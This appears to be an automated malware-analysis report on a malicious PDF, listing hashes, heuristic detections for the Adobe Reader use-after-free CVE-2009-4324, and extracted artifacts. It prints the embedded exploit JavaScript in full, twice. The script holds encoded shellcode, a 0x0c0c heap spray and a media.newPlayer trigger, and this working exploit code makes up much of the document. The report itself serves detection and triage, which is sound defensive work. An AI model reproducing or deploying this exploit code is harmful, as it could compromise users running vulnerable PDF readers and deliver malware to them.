Malicious PDF — malware analysis report

Static analysis result for SHA-256 9d0a7ccbff4f2ef3…

MALICIOUS

PDF

1.17 MB Created: 2009-12-17 03:14:38 +08:00 Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows)) First seen: 2026-05-11
MD5: 9cb533919f76612d4caeacb641a23088 SHA-1: c24227ca44feb493e5fd750cdc1c5650315c7dd0 SHA-256: 9d0a7ccbff4f2ef3e39e6746b3522d2dd8a5edc680d89784ac1bf94fee8a8e70
220 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9984

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
k1 pdf-embedded-file PDF EmbeddedFile object 26 at offset 0x1EC1 2041 bytes
SHA-256: d126f2ad4fc1902116e64aff7689cafa64a8efc447f950c255d916aa5935137f
javascript_obj0031_000.js pdf-javascript-stream PDF /JS object 31 at offset 0x12B202 4768 bytes
SHA-256: 24d7a1238d13b781894f738b03ea049c2bb3549b3ce9f8a727797def5b3aee46
Preview script
First 1,000 lines of the extracted script
var QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN=unescape;
var PLmOKuIJhYGbTFvRRedssFQAzcVBjhuGf =  QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN("\x25\x75a164\x25\x750030\x25\x750000\x25\x750005\x25\x750004\x25\x758b00\x25\x75ebf8%u5e14%udf8b%uc8b9\x25\x750000%ufc00\x25\x7535ad%uefef%uefef"+
"%ue2ab%ufff7%ue8d3%uffe7%uffff%u7f7f%ud206%uefee%ub9ef%u2fdc%u648b%udfaf%uaf64%u64e3%uf39f"+
"%u6442%ue7af%u2cb1%ubf42%u07bd%uefe2%uefef%ue866%u2b6c%u6ce7%ueb28%u1ed4%u039a%u8f2c%u8364"+
"%ucbcb%uaa64%u64d3%uc7bb%uec97%u643a\x25\x75f7a5%ub564%ueccf%u0c32%ua6db%udb64%uec64%udc1a%udc10"+
"%u132f%u6b43%u9b2f%u2ee8%ue220%u17ec%u1b04%u93d4%uc7cb%u0e9a%ub564%ueccb%u8932%ue364%u64a4"+
"%uf3b5%u32ec%ueb64%uec64%u662a%ucbab%u8ef3%u282c%u8baa%uefef%uefef%uef85%uaa62%ubfb3%uef87"+
"%uefeb%u10ef%ud39a%u9a10%u10a7%uf7ba%u26dc%u6489%ub3a2%u9264%u64d3%u5c18%u4337%u2cdd%u1145"+
"%u0d24%u8517%u62ef%u8faa%u10bf%ub39a%uba64\x25\x75bdd3%u9a10%u10a3%uf3ba%uba64%uc68f%ub7ba%u926c"+
"%uefb7%u5790%u9a10%u10a3%ue7ba%u612c%ue1a1%u6c03%u5a56%u1497%u1278%udce0%u6525%ua0b4%u28ec"+
"%u4a50%ueff8%uf993%u158a%uf0ff%ue596%u4307%u35e7%u4299%u9274%u7730%u6511%u03e1%uec78%uefe3"+
"%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef"+
"%uefef%uefef%u54ef%u5454%uef54%uefef%uefef%uefef%uefef%uefef%uefef%uefef%u9bef%u828a%uc19f"+
"%u978a%uef8a%uef07%uefef%ub2ef%u026e%uef99%uefef%u5d07%u1011%u6410%u643f%u641a%u6411%u6c21"+
"%udf2e%u5a07%u1011%udc10%u6626%ua7a2%uaa6c%ueba7%u26dc%u10be%ua79a%uba10%ud2cb%u54ef%ueffd"+
"%u039d%uefd2%ufd53%u98ef%u870a%uef10%uefef%uaf85%uba10%u66c3%ud7aa%u87bf%uef10%uefef%uba10"+
"%u64e3%u6427%ud7aa%u2eec%u076c%u29ea%uefef%u9a10%u10d7%uffba%uef85%uef85%uef87%ueff0%u10ef"+
"%ua79a%uba10%u85cf%u62ef%ub3aa%u85bf%u62eb%ubbaa%u10bf%ua79a%uba10%u85f7%u85ef%u87ef%uf0ff"+
"%uefef%u9a10%u10a7%ucfba%u85ba%u87ef%uef6f%uefef%ued85%uef85%uee85%uef87%uefef%u62af%u87aa"+
"%u6cbf%ufbaa%u04ea%u64e5%u641a\x25\x75ba10%u0364%u8910%u07fb%u101e%u1010%u6cb2%u1017%ued9a%ud604"+
"%uaa66%u87a3%uebef%uefef%uaf85%uba10%u66c3%ud3aa%uaa64%u66bb%ub7aa%ubf07%u1011%uba10%u26dc"+
"%u62be%u87aa%u6cbf%uc7aa%u04ea%u64e5%u7f1a%uba7f%u0364%u8910%u07c7%u101e%u1010%u85b2%u85ef"+
"%u1010%uebba%u7f7f%u237f%uba23%u0364%u2b6c%u851b%u071a%uef60%uefef%uaa66%u1013%ue79a%ua307"+
"%uefef%u66ef%u1baa%uef85%uaa62%ubf17%u9a10%u101b%ue79a%u9a10%u0713%uef9c%uefef%uaa64%u2617"+
"%ueb2d%u23ef%uba23%u0364%u2b6c%u8517%u071a%uefb8%uefef%uaa66%u6413%ue7a2%uaa64%u2ee3%uff0f"+
"%u6489%ubf2e%u9a10%u0713%uefa4%uefef%u2d26%uefe7%u2323%uba23%u0364%u64bc%ue7aa%ubf62%u64ec"+
"\x25\x756cf7%ueb2f%u6462%u1110%u1111%u3c18%u24cc%u0e6e%u6f6f%u6f6f%u069b%u2e18%u6f6f%uefef%ue99a"+
"%u062e%u6cff%ued2f%u0e3f%u2df4%u26b4%ueb2d%u10ef%uebca%uafcf%u10ef%ue7ca%uafcf%u10ef\x25\x75efca"+
"\x25\x75afcf");
var QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh = QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN("\x25\x750\x630\x63\x25\x750\x630\x63");
var QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY = QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
while(QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.length <= 32768)QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh+=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh;
	QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.substring(0,32768 - PLmOKuIJhYGbTFvRRedssFQAzcVBjhuGf.length);
var EDVGYujmkoQAZxdr=Array;
memRDXCFTYGVbhu=new EDVGYujmkoQAZxdr();
var PoutyGBjgewDBjyteWESDgjeeDFG=null;
var RYHJNBVCwssxcftyUIKKMNGr="WSSDCCGTYygvBHJUIikmnmM<KOPplkuYTFfeweSDDgghYUUh";
var TUOpbFEREfghrEWEDffdsdgyYY=Date;
for(i=0;i<0x1000;i++) 
{
memRDXCFTYGVbhu[i]= QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh + PLmOKuIJhYGbTFvRRedssFQAzcVBjhuGf;
}
var TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq=util;
TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq.printd("QAzwsxQWEedcERTertFCVCrtghVBbnuytTHN", new TUOpbFEREfghrEWEDffdsdgyYY());
TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq.printd("BjEdcRFvtGBBjhuIJnOkmSsXDFtGByhUjFqR", new TUOpbFEREfghrEWEDffdsdgyYY());
var IJNytfcXSQAZxcgYYHBnJIKIreddfYUII=this;
try {IJNytfcXSQAZxcgYYHBnJIKIreddfYUII.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](PoutyGBjgewDBjyteWESDgjeeDFG);} catch(e) {}
TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq.printd(QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY,new Date());
generic_stage_recovery_000.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 31 at offset 0x12B202 4548 bytes
SHA-256: 0cd877e14ff21b7d8dd8b9709d2412c30c972542b8db176cdbfe62d4104a6113
Detection
ClamAV: No threats found
Obfuscation or payload: likely
14 of 20 identifiers look randomly generated (e.g. 'QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkm') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN=unescape;
var PLmOKuIJhYGbTFvRRedssFQAzcVBjhuGf =  QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN("%ua164%u0030%u0000%u0005%u0004%u8b00%uebf8%u5e14%udf8b%uc8b9%u0000%ufc00%u35ad%uefef%uefef%ue2ab%ufff7%ue8d3%uffe7%uffff%u7f7f%ud206%uefee%ub9ef%u2fdc%u648b%udfaf%uaf64%u64e3%uf39f%u6442%ue7af%u2cb1%ubf42%u07bd%uefe2%uefef%ue866%u2b6c%u6ce7%ueb28%u1ed4%u039a%u8f2c%u8364%ucbcb%uaa64%u64d3%uc7bb%uec97%u643a%uf7a5%ub564%ueccf%u0c32%ua6db%udb64%uec64%udc1a%udc10%u132f%u6b43%u9b2f%u2ee8%ue220%u17ec%u1b04%u93d4%uc7cb%u0e9a%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%u662a%ucbab%u8ef3%u282c%u8baa%uefef%uefef%uef85%uaa62%ubfb3%uef87%uefeb%u10ef%ud39a%u9a10%u10a7%uf7ba%u26dc%u6489%ub3a2%u9264%u64d3%u5c18%u4337%u2cdd%u1145%u0d24%u8517%u62ef%u8faa%u10bf%ub39a%uba64%ubdd3%u9a10%u10a3%uf3ba%uba64%uc68f%ub7ba%u926c%uefb7%u5790%u9a10%u10a3%ue7ba%u612c%ue1a1%u6c03%u5a56%u1497%u1278%udce0%u6525%ua0b4%u28ec%u4a50%ueff8%uf993%u158a%uf0ff%ue596%u4307%u35e7%u4299%u9274%u7730%u6511%u03e1%uec78%uefe3%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%uefef%u54ef%u5454%uef54%uefef%uefef%uefef%uefef%uefef%uefef%uefef%u9bef%u828a%uc19f%u978a%uef8a%uef07%uefef%ub2ef%u026e%uef99%uefef%u5d07%u1011%u6410%u643f%u641a%u6411%u6c21%udf2e%u5a07%u1011%udc10%u6626%ua7a2%uaa6c%ueba7%u26dc%u10be%ua79a%uba10%ud2cb%u54ef%ueffd%u039d%uefd2%ufd53%u98ef%u870a%uef10%uefef%uaf85%uba10%u66c3%ud7aa%u87bf%uef10%uefef%uba10%u64e3%u6427%ud7aa%u2eec%u076c%u29ea%uefef%u9a10%u10d7%uffba%uef85%uef85%uef87%ueff0%u10ef"+
"%ua79a%uba10%u85cf%u62ef%ub3aa%u85bf%u62eb%ubbaa%u10bf%ua79a%uba10%u85f7%u85ef%u87ef%uf0ff%uefef%u9a10%u10a7%ucfba%u85ba%u87ef%uef6f%uefef%ued85%uef85%uee85%uef87%uefef%u62af%u87aa%u6cbf%ufbaa%u04ea%u64e5%u641a%uba10%u0364%u8910%u07fb%u101e%u1010%u6cb2%u1017%ued9a%ud604%uaa66%u87a3%uebef%uefef%uaf85%uba10%u66c3%ud3aa%uaa64%u66bb%ub7aa%ubf07%u1011%uba10%u26dc%u62be%u87aa%u6cbf%uc7aa%u04ea%u64e5%u7f1a%uba7f%u0364%u8910%u07c7%u101e%u1010%u85b2%u85ef%u1010%uebba%u7f7f%u237f%uba23%u0364%u2b6c%u851b%u071a%uef60%uefef%uaa66%u1013%ue79a%ua307%uefef%u66ef%u1baa%uef85%uaa62%ubf17%u9a10%u101b%ue79a%u9a10%u0713%uef9c%uefef%uaa64%u2617%ueb2d%u23ef%uba23%u0364%u2b6c%u8517%u071a%uefb8%uefef%uaa66%u6413%ue7a2%uaa64%u2ee3%uff0f%u6489%ubf2e%u9a10%u0713%uefa4%uefef%u2d26%uefe7%u2323%uba23%u0364%u64bc%ue7aa%ubf62%u64ec%u6cf7%ueb2f%u6462%u1110%u1111%u3c18%u24cc%u0e6e%u6f6f%u6f6f%u069b%u2e18%u6f6f%uefef%ue99a%u062e%u6cff%ued2f%u0e3f%u2df4%u26b4%ueb2d%u10ef%uebca%uafcf%u10ef%ue7ca%uafcf%u10ef%uefca%uafcf");
var QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh = QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN("\x25\x750\x630\x63\x25\x750\x630\x63");
var QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY = QAZCDErfvnyhUJMdsWTcjhUIILQasfvIOPyrCVbXSwdhUtrN("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
while(QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.length <= 32768)QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh+=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh;
	QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.substring(0,32768 - PLmOKuIJhYGbTFvRRedssFQAzcVBjhuGf.length);
var EDVGYujmkoQAZxdr=Array;
memRDXCFTYGVbhu=new EDVGYujmkoQAZxdr();
var PoutyGBjgewDBjyteWESDgjeeDFG=null;
var RYHJNBVCwssxcftyUIKKMNGr="WSSDCCGTYygvBHJUIikmnmM<KOPplkuYTFfeweSDDgghYUUh";
var TUOpbFEREfghrEWEDffdsdgyYY=Date;
for(i=0;i<0x1000;i++) 
{
memRDXCFTYGVbhu[i]= QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh + PLmOKuIJhYGbTFvRRedssFQAzcVBjhuGf;
}
var TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq=util;
TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq.printd("QAzwsxQWEedcERTertFCVCrtghVBbnuytTHN", new TUOpbFEREfghrEWEDffdsdgyYY());
TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq.printd("BjEdcRFvtGBBjhuIJnOkmSsXDFtGByhUjFqR", new TUOpbFEREfghrEWEDffdsdgyYY());
var IJNytfcXSQAZxcgYYHBnJIKIreddfYUII=this;
try {IJNytfcXSQAZxcgYYHBnJIKIreddfYUII.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](PoutyGBjgewDBjyteWESDgjeeDFG);} catch(e) {}
TGBHIIOKmbdwwSXCGUHikmnGEQQazcBNKpkjbcswfmnzq.printd(QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY,new Date());

Open this report in the interactive analyzer, or submit your own file for analysis.